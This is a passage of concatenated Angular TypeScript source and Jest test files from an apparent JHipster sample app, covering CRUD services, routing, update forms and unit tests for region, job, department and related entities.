        service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));

        const req = httpMock.expectOne({ method: 'DELETE' });
        req.flush({ status: 200 });
        // Fix: the original `expect(expectedResult);` had no matcher and asserted nothing.
        expect(expectedResult).toBe(true);
      });

      describe('addDepartmentMySuffixToCollectionIfMissing', () => {
        it('should add a DepartmentMySuffix to an empty array', () => {
          const department: IDepartmentMySuffix = { id: 'ABC' };
          expectedResult = service.addDepartmentMySuffixToCollectionIfMissing([], department);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(department);
        });

        it('should not add a DepartmentMySuffix to an array that contains it', () => {
          const department: IDepartmentMySuffix = { id: 'ABC' };
          const departmentCollection: IDepartmentMySuffix[] = [
            {
              ...department,
            },
            { id: 'CBA' },
          ];
          expectedResult = service.addDepartmentMySuffixToCollectionIfMissing(departmentCollection, department);
          expect(expectedResult).toHaveLength(2);
        });

        it("should add a DepartmentMySuffix to an array that doesn't contain it", () => {
          const department: IDepartmentMySuffix = { id: 'ABC' };
          const departmentCollection: IDepartmentMySuffix[] = [{ id: 'CBA' }];
          expectedResult = service.addDepartmentMySuffixToCollectionIfMissing(departmentCollection, department);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(department);
        });

        it('should add only unique DepartmentMySuffix to an array', () => {
          const departmentArray: IDepartmentMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'Administrator' }];
          const departmentCollection: IDepartmentMySuffix[] = [{ id: 'ABC' }];
          expectedResult = service.addDepartmentMySuffixToCollectionIfMissing(departmentCollection, ...departmentArray);
          expect(expectedResult).toHaveLength(3);
        });

        it('should accept varargs', () => {
          const department: IDepartmentMySuffix = { id: 'ABC' };
          const department2: IDepartmentMySuffix = { id: 'CBA' };
          expectedResult = service.addDepartmentMySuffixToCollectionIfMissing([], department, department2);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(department);
          expect(expectedResult).toContain(department2);
        });

        it('should accept null and undefined values', () => {
          const department: IDepartmentMySuffix = { id: 'ABC' };
          expectedResult = service.addDepartmentMySuffixToCollectionIfMissing([], null, department, undefined);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(department);
        });
      });
    });

    afterEach(() => {
      // Fails the spec if any HTTP request was made but not flushed above.
      httpMock.verify();
    });
  });
});
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { JobMySuffixComponent } from '../list/job-my-suffix.component';
import { JobMySuffixDetailComponent } from '../detail/job-my-suffix-detail.component';
import { JobMySuffixUpdateComponent } from '../update/job-my-suffix-update.component';
import { JobMySuffixRoutingResolveService } from './job-my-suffix-routing-resolve.service';
/**
 * Route table for the JobMySuffix entity. Every route is guarded by
 * UserRouteAccessService; detail/new/edit routes resolve the entity up-front
 * via JobMySuffixRoutingResolveService. The declaration order is preserved
 * because it determines route matching precedence.
 */
const routes: Routes = [
  {
    path: '',
    component: JobMySuffixComponent,
    data: {
      defaultSort: 'id,asc',
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/view',
    component: JobMySuffixDetailComponent,
    resolve: {
      job: JobMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: 'new',
    component: JobMySuffixUpdateComponent,
    resolve: {
      job: JobMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/edit',
    component: JobMySuffixUpdateComponent,
    resolve: {
      job: JobMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
];

@NgModule({
  imports: [RouterModule.forChild(routes)],
  exports: [RouterModule],
})
export class JobMySuffixRoutingModule {}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { Observable } from 'rxjs';
import { finalize, map } from 'rxjs/operators';
import { IJobMySuffix, JobMySuffix } from '../job-my-suffix.model';
import { JobMySuffixService } from '../service/job-my-suffix.service';
import { ITaskMySuffix } from 'app/entities/task-my-suffix/task-my-suffix.model';
import { TaskMySuffixService } from 'app/entities/task-my-suffix/service/task-my-suffix.service';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { EmployeeMySuffixService } from 'app/entities/employee-my-suffix/service/employee-my-suffix.service';
@Component({
  selector: 'jhi-job-my-suffix-update',
  templateUrl: './job-my-suffix-update.component.html',
})
export class JobMySuffixUpdateComponent implements OnInit {
  // True while a create/update request is in flight; disables the save button.
  isSaving = false;

  // Options for the relationship drop-downs rendered by the template.
  tasksSharedCollection: ITaskMySuffix[] = [];
  employeesSharedCollection: IEmployeeMySuffix[] = [];

  // Reactive form mirroring the IJobMySuffix fields; no validators are applied.
  editForm = this.fb.group({
    id: [],
    jobTitle: [],
    minSalary: [],
    maxSalary: [],
    tasks: [],
    employee: [],
  });

  constructor(
    protected jobService: JobMySuffixService,
    protected taskService: TaskMySuffixService,
    protected employeeService: EmployeeMySuffixService,
    protected activatedRoute: ActivatedRoute,
    protected fb: FormBuilder
  ) {}

  // Patches the form from the routed entity, then loads drop-down options.
  // Ordering matters: loadRelationshipsOptions() reads the just-patched form values.
  ngOnInit(): void {
    this.activatedRoute.data.subscribe(({ job }) => {
      this.updateForm(job);

      this.loadRelationshipsOptions();
    });
  }

  // Navigates back to wherever the user came from.
  previousState(): void {
    window.history.back();
  }

  // Persists the form: update when the entity already has an id, create otherwise.
  save(): void {
    this.isSaving = true;
    const job = this.createFromForm();
    if (job.id !== undefined) {
      this.subscribeToSaveResponse(this.jobService.update(job));
    } else {
      this.subscribeToSaveResponse(this.jobService.create(job));
    }
  }

  // trackBy function for the task options.
  trackTaskMySuffixById(index: number, item: ITaskMySuffix): string {
    return item.id!;
  }

  // trackBy function for the employee options.
  trackEmployeeMySuffixById(index: number, item: IEmployeeMySuffix): string {
    return item.id!;
  }

  // For a multi-select: returns the already-selected instance matching `option`
  // (so Angular keeps it highlighted), or `option` itself when not selected.
  getSelectedTaskMySuffix(option: ITaskMySuffix, selectedVals?: ITaskMySuffix[]): ITaskMySuffix {
    if (selectedVals) {
      for (const selectedVal of selectedVals) {
        if (option.id === selectedVal.id) {
          return selectedVal;
        }
      }
    }
    return option;
  }

  // Wires the save observable: always clear isSaving, navigate back on success.
  protected subscribeToSaveResponse(result: Observable<HttpResponse<IJobMySuffix>>): void {
    result.pipe(finalize(() => this.onSaveFinalize())).subscribe(
      () => this.onSaveSuccess(),
      () => this.onSaveError()
    );
  }

  protected onSaveSuccess(): void {
    this.previousState();
  }

  protected onSaveError(): void {
    // Api for inheritance.
  }

  protected onSaveFinalize(): void {
    this.isSaving = false;
  }

  // Copies the entity into the form and merges its relationships into the
  // drop-down collections so pre-selected values are always listed.
  protected updateForm(job: IJobMySuffix): void {
    this.editForm.patchValue({
      id: job.id,
      jobTitle: job.jobTitle,
      minSalary: job.minSalary,
      maxSalary: job.maxSalary,
      tasks: job.tasks,
      employee: job.employee,
    });

    this.tasksSharedCollection = this.taskService.addTaskMySuffixToCollectionIfMissing(this.tasksSharedCollection, ...(job.tasks ?? []));
    this.employeesSharedCollection = this.employeeService.addEmployeeMySuffixToCollectionIfMissing(
      this.employeesSharedCollection,
      job.employee
    );
  }

  // Queries all tasks and employees for the drop-downs, making sure the values
  // currently held by the form are present even if missing from the query result.
  protected loadRelationshipsOptions(): void {
    this.taskService
      .query()
      .pipe(map((res: HttpResponse<ITaskMySuffix[]>) => res.body ?? []))
      .pipe(
        map((tasks: ITaskMySuffix[]) =>
          this.taskService.addTaskMySuffixToCollectionIfMissing(tasks, ...(this.editForm.get('tasks')!.value ?? []))
        )
      )
      .subscribe((tasks: ITaskMySuffix[]) => (this.tasksSharedCollection = tasks));

    this.employeeService
      .query()
      .pipe(map((res: HttpResponse<IEmployeeMySuffix[]>) => res.body ?? []))
      .pipe(
        map((employees: IEmployeeMySuffix[]) =>
          this.employeeService.addEmployeeMySuffixToCollectionIfMissing(employees, this.editForm.get('employee')!.value)
        )
      )
      .subscribe((employees: IEmployeeMySuffix[]) => (this.employeesSharedCollection = employees));
  }

  // Builds an IJobMySuffix from the current form values (inverse of updateForm).
  protected createFromForm(): IJobMySuffix {
    return {
      ...new JobMySuffix(),
      id: this.editForm.get(['id'])!.value,
      jobTitle: this.editForm.get(['jobTitle'])!.value,
      minSalary: this.editForm.get(['minSalary'])!.value,
      maxSalary: this.editForm.get(['maxSalary'])!.value,
      tasks: this.editForm.get(['tasks'])!.value,
      employee: this.editForm.get(['employee'])!.value,
    };
  }
}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { CountryMySuffixComponent } from '../list/country-my-suffix.component';
import { CountryMySuffixDetailComponent } from '../detail/country-my-suffix-detail.component';
import { CountryMySuffixUpdateComponent } from '../update/country-my-suffix-update.component';
import { CountryMySuffixRoutingResolveService } from './country-my-suffix-routing-resolve.service';
/**
 * Route table for the CountryMySuffix entity. Every route is guarded by
 * UserRouteAccessService; detail/new/edit routes resolve the entity up-front
 * via CountryMySuffixRoutingResolveService. The declaration order is preserved
 * because it determines route matching precedence.
 */
const routes: Routes = [
  {
    path: '',
    component: CountryMySuffixComponent,
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/view',
    component: CountryMySuffixDetailComponent,
    resolve: {
      country: CountryMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: 'new',
    component: CountryMySuffixUpdateComponent,
    resolve: {
      country: CountryMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/edit',
    component: CountryMySuffixUpdateComponent,
    resolve: {
      country: CountryMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
];

@NgModule({
  imports: [RouterModule.forChild(routes)],
  exports: [RouterModule],
})
export class CountryMySuffixRoutingModule {}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { NgbModal } from '@ng-bootstrap/ng-bootstrap';
import { IRegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
import { RegionMySuffixDeleteDialogComponent } from '../delete/region-my-suffix-delete-dialog.component';
@Component({
  selector: 'jhi-region-my-suffix',
  templateUrl: './region-my-suffix.component.html',
})
export class RegionMySuffixComponent implements OnInit {
  /** Regions currently rendered in the list; undefined until the first load completes. */
  regions?: IRegionMySuffix[];
  /** True while a query() request is in flight so the template can show a spinner. */
  isLoading = false;

  constructor(protected regionService: RegionMySuffixService, protected modalService: NgbModal) {}

  /** Fetches every region from the backend and replaces the local list. */
  loadAll(): void {
    this.isLoading = true;
    const onSuccess = (response: HttpResponse<IRegionMySuffix[]>): void => {
      this.isLoading = false;
      this.regions = response.body ?? [];
    };
    const onError = (): void => {
      this.isLoading = false;
    };
    this.regionService.query().subscribe(onSuccess, onError);
  }

  ngOnInit(): void {
    this.loadAll();
  }

  /** trackBy function for *ngFor: identifies a row by its primary key. */
  trackId(index: number, item: IRegionMySuffix): string {
    return item.id!;
  }

  /** Opens the delete confirmation dialog and reloads the list after a successful delete. */
  delete(region: IRegionMySuffix): void {
    const ref = this.modalService.open(RegionMySuffixDeleteDialogComponent, { size: 'lg', backdrop: 'static' });
    ref.componentInstance.region = region;
    // unsubscribe not needed because closed completes on modal close
    ref.closed.subscribe(reason => {
      if (reason === 'deleted') {
        this.loadAll();
      }
    });
  }
}
<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpResponse } from '@angular/common/http';
import { Observable } from 'rxjs';
import { isPresent } from 'app/core/util/operators';
import { ApplicationConfigService } from 'app/core/config/application-config.service';
import { createRequestOption } from 'app/core/request/request-util';
import { IRegionMySuffix, getRegionMySuffixIdentifier } from '../region-my-suffix.model';
export type EntityResponseType = HttpResponse<IRegionMySuffix>;
export type EntityArrayResponseType = HttpResponse<IRegionMySuffix[]>;

/**
 * HTTP data-access service for the RegionMySuffix entity.
 * Every method returns the full HttpResponse so callers can inspect status/headers.
 */
@Injectable({ providedIn: 'root' })
export class RegionMySuffixService {
  public resourceUrl = this.applicationConfigService.getEndpointFor('api/regions');

  constructor(protected http: HttpClient, private applicationConfigService: ApplicationConfigService) {}

  /** Creates a new region on the server (POST). */
  create(region: IRegionMySuffix): Observable<EntityResponseType> {
    return this.http.post<IRegionMySuffix>(this.resourceUrl, region, { observe: 'response' });
  }

  /** Replaces an existing region (full update, PUT). */
  update(region: IRegionMySuffix): Observable<EntityResponseType> {
    return this.http.put<IRegionMySuffix>(`${this.resourceUrl}/${getRegionMySuffixIdentifier(region) as string}`, region, {
      observe: 'response',
    });
  }

  /** Applies a partial update (PATCH) containing only the fields set on `region`. */
  partialUpdate(region: IRegionMySuffix): Observable<EntityResponseType> {
    return this.http.patch<IRegionMySuffix>(`${this.resourceUrl}/${getRegionMySuffixIdentifier(region) as string}`, region, {
      observe: 'response',
    });
  }

  /** Fetches a single region by primary key. */
  find(id: string): Observable<EntityResponseType> {
    return this.http.get<IRegionMySuffix>(`${this.resourceUrl}/${id}`, { observe: 'response' });
  }

  /** Fetches all regions; `req` is converted into query parameters (paging/sorting). */
  query(req?: any): Observable<EntityArrayResponseType> {
    const options = createRequestOption(req);
    return this.http.get<IRegionMySuffix[]>(this.resourceUrl, { params: options, observe: 'response' });
  }

  /** Deletes the region with the given primary key. */
  delete(id: string): Observable<HttpResponse<{}>> {
    return this.http.delete(`${this.resourceUrl}/${id}`, { observe: 'response' });
  }

  /**
   * Prepends to `regionCollection` every region from `regionsToCheck` whose
   * identifier is not already present. Null/undefined entries and duplicates
   * within `regionsToCheck` are skipped. Returns the original array unchanged
   * when there is nothing to check, otherwise a new array.
   */
  addRegionMySuffixToCollectionIfMissing(
    regionCollection: IRegionMySuffix[],
    ...regionsToCheck: (IRegionMySuffix | null | undefined)[]
  ): IRegionMySuffix[] {
    const regions: IRegionMySuffix[] = regionsToCheck.filter(isPresent);
    if (regions.length > 0) {
      // A Set gives O(1) membership tests; the original used Array.includes,
      // which is O(n) per candidate (accidental O(n*m) overall).
      const regionCollectionIdentifiers = new Set(regionCollection.map(regionItem => getRegionMySuffixIdentifier(regionItem)!));
      const regionsToAdd = regions.filter(regionItem => {
        const regionIdentifier = getRegionMySuffixIdentifier(regionItem);
        if (regionIdentifier == null || regionCollectionIdentifiers.has(regionIdentifier)) {
          return false;
        }
        regionCollectionIdentifiers.add(regionIdentifier);
        return true;
      });
      return [...regionsToAdd, ...regionCollection];
    }
    return regionCollection;
  }
}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { JobMySuffixService } from '../service/job-my-suffix.service';
import { IJobMySuffix, JobMySuffix } from '../job-my-suffix.model';
import { ITaskMySuffix } from 'app/entities/task-my-suffix/task-my-suffix.model';
import { TaskMySuffixService } from 'app/entities/task-my-suffix/service/task-my-suffix.service';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { EmployeeMySuffixService } from 'app/entities/employee-my-suffix/service/employee-my-suffix.service';
import { JobMySuffixUpdateComponent } from './job-my-suffix-update.component';
// Unit tests for JobMySuffixUpdateComponent: relationship option loading in
// ngOnInit, form population, the save() create/update/error flows, and the
// trackBy / selected-option helper methods.
describe('Component Tests', () => {
  describe('JobMySuffix Management Update Component', () => {
    let comp: JobMySuffixUpdateComponent;
    let fixture: ComponentFixture<JobMySuffixUpdateComponent>;
    let activatedRoute: ActivatedRoute;
    let jobService: JobMySuffixService;
    let taskService: TaskMySuffixService;
    let employeeService: EmployeeMySuffixService;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
        declarations: [JobMySuffixUpdateComponent],
        providers: [FormBuilder, ActivatedRoute],
      })
        .overrideTemplate(JobMySuffixUpdateComponent, '')
        .compileComponents();

      fixture = TestBed.createComponent(JobMySuffixUpdateComponent);
      activatedRoute = TestBed.inject(ActivatedRoute);
      jobService = TestBed.inject(JobMySuffixService);
      taskService = TestBed.inject(TaskMySuffixService);
      employeeService = TestBed.inject(EmployeeMySuffixService);

      comp = fixture.componentInstance;
    });

    describe('ngOnInit', () => {
      it('Should call TaskMySuffix query and add missing value', () => {
        const job: IJobMySuffix = { id: 'CBA' };
        const tasks: ITaskMySuffix[] = [{ id: '<NAME>' }];
        job.tasks = tasks;
        const taskCollection: ITaskMySuffix[] = [{ id: 'payment Grocery Baby' }];
        spyOn(taskService, 'query').and.returnValue(of(new HttpResponse({ body: taskCollection })));
        const additionalTaskMySuffixes = [...tasks];
        const expectedCollection: ITaskMySuffix[] = [...additionalTaskMySuffixes, ...taskCollection];
        spyOn(taskService, 'addTaskMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ job });
        comp.ngOnInit();

        expect(taskService.query).toHaveBeenCalled();
        expect(taskService.addTaskMySuffixToCollectionIfMissing).toHaveBeenCalledWith(taskCollection, ...additionalTaskMySuffixes);
        expect(comp.tasksSharedCollection).toEqual(expectedCollection);
      });

      it('Should call EmployeeMySuffix query and add missing value', () => {
        const job: IJobMySuffix = { id: 'CBA' };
        const employee: IEmployeeMySuffix = { id: 'maximized' };
        job.employee = employee;

        const employeeCollection: IEmployeeMySuffix[] = [{ id: 'Sleek' }];
        spyOn(employeeService, 'query').and.returnValue(of(new HttpResponse({ body: employeeCollection })));
        const additionalEmployeeMySuffixes = [employee];
        const expectedCollection: IEmployeeMySuffix[] = [...additionalEmployeeMySuffixes, ...employeeCollection];
        spyOn(employeeService, 'addEmployeeMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ job });
        comp.ngOnInit();

        expect(employeeService.query).toHaveBeenCalled();
        expect(employeeService.addEmployeeMySuffixToCollectionIfMissing).toHaveBeenCalledWith(
          employeeCollection,
          ...additionalEmployeeMySuffixes
        );
        expect(comp.employeesSharedCollection).toEqual(expectedCollection);
      });

      it('Should update editForm', () => {
        const job: IJobMySuffix = { id: 'CBA' };
        const tasks: ITaskMySuffix = { id: 'morph South' };
        job.tasks = [tasks];
        const employee: IEmployeeMySuffix = { id: 'alarm Switchable dot-com' };
        job.employee = employee;

        activatedRoute.data = of({ job });
        comp.ngOnInit();

        expect(comp.editForm.value).toEqual(expect.objectContaining(job));
        expect(comp.tasksSharedCollection).toContain(tasks);
        expect(comp.employeesSharedCollection).toContain(employee);
      });
    });

    describe('save', () => {
      it('Should call update service on save for existing entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const job = { id: 'ABC' };
        spyOn(jobService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ job });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: job }));
        saveSubject.complete();

        // THEN
        expect(comp.previousState).toHaveBeenCalled();
        expect(jobService.update).toHaveBeenCalledWith(job);
        expect(comp.isSaving).toEqual(false);
      });

      it('Should call create service on save for new entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const job = new JobMySuffix();
        spyOn(jobService, 'create').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ job });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: job }));
        saveSubject.complete();

        // THEN
        expect(jobService.create).toHaveBeenCalledWith(job);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).toHaveBeenCalled();
      });

      it('Should set isSaving to false on error', () => {
        // GIVEN
        const saveSubject = new Subject();
        const job = { id: 'ABC' };
        spyOn(jobService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ job });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.error('This is an error!');

        // THEN
        expect(jobService.update).toHaveBeenCalledWith(job);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).not.toHaveBeenCalled();
      });
    });

    describe('Tracking relationships identifiers', () => {
      describe('trackTaskMySuffixById', () => {
        it('Should return tracked TaskMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackTaskMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });

      describe('trackEmployeeMySuffixById', () => {
        it('Should return tracked EmployeeMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackEmployeeMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });
    });

    describe('Getting selected relationships', () => {
      describe('getSelectedTaskMySuffix', () => {
        it('Should return option if no TaskMySuffix is selected', () => {
          const option = { id: 'ABC' };
          const result = comp.getSelectedTaskMySuffix(option);
          expect(result === option).toEqual(true);
        });

        it('Should return selected TaskMySuffix for according option', () => {
          const option = { id: 'ABC' };
          const selected = { id: 'ABC' };
          const selected2 = { id: 'CBA' };
          const result = comp.getSelectedTaskMySuffix(option, [selected2, selected]);
          expect(result === selected).toEqual(true);
          expect(result === selected2).toEqual(false);
          expect(result === option).toEqual(false);
        });

        it('Should return option if this TaskMySuffix is not selected', () => {
          const option = { id: 'ABC' };
          const selected = { id: 'CBA' };
          const result = comp.getSelectedTaskMySuffix(option, [selected]);
          expect(result === option).toEqual(true);
          expect(result === selected).toEqual(false);
        });
      });
    });
  });
});
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { LocationMySuffixComponent } from './list/location-my-suffix.component';
import { LocationMySuffixDetailComponent } from './detail/location-my-suffix-detail.component';
import { LocationMySuffixUpdateComponent } from './update/location-my-suffix-update.component';
import { LocationMySuffixDeleteDialogComponent } from './delete/location-my-suffix-delete-dialog.component';
import { LocationMySuffixRoutingModule } from './route/location-my-suffix-routing.module';
/**
 * Feature module bundling the Location entity's CRUD UI — list, detail,
 * create/edit form and delete confirmation dialog — wired to its routing
 * module. The dialog is listed in entryComponents because it is opened
 * dynamically via NgbModal.
 */
@NgModule({
  imports: [SharedModule, LocationMySuffixRoutingModule],
  declarations: [
    LocationMySuffixComponent,
    LocationMySuffixDetailComponent,
    LocationMySuffixUpdateComponent,
    LocationMySuffixDeleteDialogComponent,
  ],
  entryComponents: [LocationMySuffixDeleteDialogComponent],
})
export class LocationMySuffixModule {}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule } from '@angular/router';
/**
 * Top-level entity router: lazily loads one feature module per entity so a
 * module's code is only fetched when its route is first visited. Each
 * route's `pageTitle` is an i18n key resolved by the title strategy.
 */
@NgModule({
  imports: [
    RouterModule.forChild([
      {
        path: 'region-my-suffix',
        data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.region.home.title' },
        loadChildren: () => import('./region-my-suffix/region-my-suffix.module').then(m => m.RegionMySuffixModule),
      },
      {
        path: 'country-my-suffix',
        data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.country.home.title' },
        loadChildren: () => import('./country-my-suffix/country-my-suffix.module').then(m => m.CountryMySuffixModule),
      },
      {
        path: 'location-my-suffix',
        data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.location.home.title' },
        loadChildren: () => import('./location-my-suffix/location-my-suffix.module').then(m => m.LocationMySuffixModule),
      },
      {
        path: 'department-my-suffix',
        data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.department.home.title' },
        loadChildren: () => import('./department-my-suffix/department-my-suffix.module').then(m => m.DepartmentMySuffixModule),
      },
      {
        path: 'task-my-suffix',
        data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.task.home.title' },
        loadChildren: () => import('./task-my-suffix/task-my-suffix.module').then(m => m.TaskMySuffixModule),
      },
      {
        path: 'employee-my-suffix',
        data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.employee.home.title' },
        loadChildren: () => import('./employee-my-suffix/employee-my-suffix.module').then(m => m.EmployeeMySuffixModule),
      },
      {
        path: 'job-my-suffix',
        data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.job.home.title' },
        loadChildren: () => import('./job-my-suffix/job-my-suffix.module').then(m => m.JobMySuffixModule),
      },
      {
        path: 'job-history-my-suffix',
        data: { pageTitle: 'jhipsterSampleApplicationsiavshApp.jobHistory.home.title' },
        loadChildren: () => import('./job-history-my-suffix/job-history-my-suffix.module').then(m => m.JobHistoryMySuffixModule),
      },
      /* jhipster-needle-add-entity-route - JHipster will add entity modules routes here */
    ]),
  ],
})
export class EntityRoutingModule {}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { RegionMySuffixComponent } from './list/region-my-suffix.component';
import { RegionMySuffixDetailComponent } from './detail/region-my-suffix-detail.component';
import { RegionMySuffixUpdateComponent } from './update/region-my-suffix-update.component';
import { RegionMySuffixDeleteDialogComponent } from './delete/region-my-suffix-delete-dialog.component';
import { RegionMySuffixRoutingModule } from './route/region-my-suffix-routing.module';
/**
 * Feature module bundling the Region entity's CRUD UI — list, detail,
 * create/edit form and delete confirmation dialog — wired to its routing
 * module. The dialog is listed in entryComponents because it is opened
 * dynamically via NgbModal.
 */
@NgModule({
  imports: [SharedModule, RegionMySuffixRoutingModule],
  declarations: [
    RegionMySuffixComponent,
    RegionMySuffixDetailComponent,
    RegionMySuffixUpdateComponent,
    RegionMySuffixDeleteDialogComponent,
  ],
  entryComponents: [RegionMySuffixDeleteDialogComponent],
})
export class RegionMySuffixModule {}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
import { IRegionMySuffix, RegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixUpdateComponent } from './region-my-suffix-update.component';
// Unit tests for RegionMySuffixUpdateComponent: form population in ngOnInit
// and the save() create/update/error flows.
describe('Component Tests', () => {
  describe('RegionMySuffix Management Update Component', () => {
    let comp: RegionMySuffixUpdateComponent;
    let fixture: ComponentFixture<RegionMySuffixUpdateComponent>;
    let activatedRoute: ActivatedRoute;
    let regionService: RegionMySuffixService;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
        declarations: [RegionMySuffixUpdateComponent],
        providers: [FormBuilder, ActivatedRoute],
      })
        .overrideTemplate(RegionMySuffixUpdateComponent, '')
        .compileComponents();

      fixture = TestBed.createComponent(RegionMySuffixUpdateComponent);
      activatedRoute = TestBed.inject(ActivatedRoute);
      regionService = TestBed.inject(RegionMySuffixService);

      comp = fixture.componentInstance;
    });

    describe('ngOnInit', () => {
      it('Should update editForm', () => {
        const region: IRegionMySuffix = { id: 'CBA' };

        activatedRoute.data = of({ region });
        comp.ngOnInit();

        expect(comp.editForm.value).toEqual(expect.objectContaining(region));
      });
    });

    describe('save', () => {
      it('Should call update service on save for existing entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const region = { id: 'ABC' };
        spyOn(regionService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ region });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: region }));
        saveSubject.complete();

        // THEN
        expect(comp.previousState).toHaveBeenCalled();
        expect(regionService.update).toHaveBeenCalledWith(region);
        expect(comp.isSaving).toEqual(false);
      });

      it('Should call create service on save for new entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const region = new RegionMySuffix();
        spyOn(regionService, 'create').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ region });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: region }));
        saveSubject.complete();

        // THEN
        expect(regionService.create).toHaveBeenCalledWith(region);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).toHaveBeenCalled();
      });

      it('Should set isSaving to false on error', () => {
        // GIVEN
        const saveSubject = new Subject();
        const region = { id: 'ABC' };
        spyOn(regionService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ region });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.error('This is an error!');

        // THEN
        expect(regionService.update).toHaveBeenCalledWith(region);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).not.toHaveBeenCalled();
      });
    });
  });
});
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { DepartmentMySuffixService } from '../service/department-my-suffix.service';
import { IDepartmentMySuffix, DepartmentMySuffix } from '../department-my-suffix.model';
import { ILocationMySuffix } from 'app/entities/location-my-suffix/location-my-suffix.model';
import { LocationMySuffixService } from 'app/entities/location-my-suffix/service/location-my-suffix.service';
import { DepartmentMySuffixUpdateComponent } from './department-my-suffix-update.component';
// Unit tests for DepartmentMySuffixUpdateComponent: location option loading
// in ngOnInit, form population, the save() create/update/error flows, and
// the trackBy helper.
describe('Component Tests', () => {
